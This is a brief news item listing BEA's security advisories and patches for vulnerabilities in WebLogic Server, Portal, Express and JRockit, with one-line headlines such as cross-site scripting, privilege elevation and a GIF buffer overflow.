Updates for vulnerabilities in several BEA Weblogic products
The vendor fixes numerous vulnerabilities in their products Bea Weblogic Express, Portal, Server and JRockit, which could be exploited by attackers, for instance to spy out information, infiltrate files, bypass security measures or execute cross-site scripting attacks. The vendor’s respective security advisories provide links to these updates – a cumulative patch is not available.
- Requests served through WebLogic proxy servlets may acquire elevated privileges, BEA advisory
- Security policies may not be enforced on WebLogic JMS servers, BEA advisory
- WebLogic Server Embedded LDAP may be susceptible to a brute force attack, BEA advisory
- The WebLogic console may display certain Web Service sensitive attributes in clear text, BEA advisory
- Security policy may not be applied to WebLogic administration deployers when uploading archives, BEA advisory
- Patches available to prevent multiple cross-site scripting (XSS) vulnerabilities, BEA advisory
- The WLST script generated by configToScript may not encrypt sensitive attributes when creating a new domain, BEA advisory
- WebLogic JMS Message Bridge not enforcing proper credentials to access a protected queue, BEA advisory
- Cross-site scripting attacks in the WebLogic Portal Groupspace application, BEA advisory
- Inadvertent corruption of entitlements could result in unauthorized access to protected resources, BEA advisory
- An SSL port may be susceptible to a Denial of Service attack, BEA advisory
- WebLogic SSL may verify RSA Signatures incorrectly if the RSA key exponent is 3, BEA advisory
- Exposure of filenames in development mode, BEA advisory
- Non-trusted Applets may be able to exploit serialization condition to elevate privileges, advisory on BEA JRockit
- An Application started through Java Web Start may be able to elevate its privileges, advisory on BEA JRockit
- Buffer Overflow in processing GIF images, advisory on BEA JRockit
- Non-trusted Applets may be able to elevate privileges, advisory on BEA JRockit
(mba)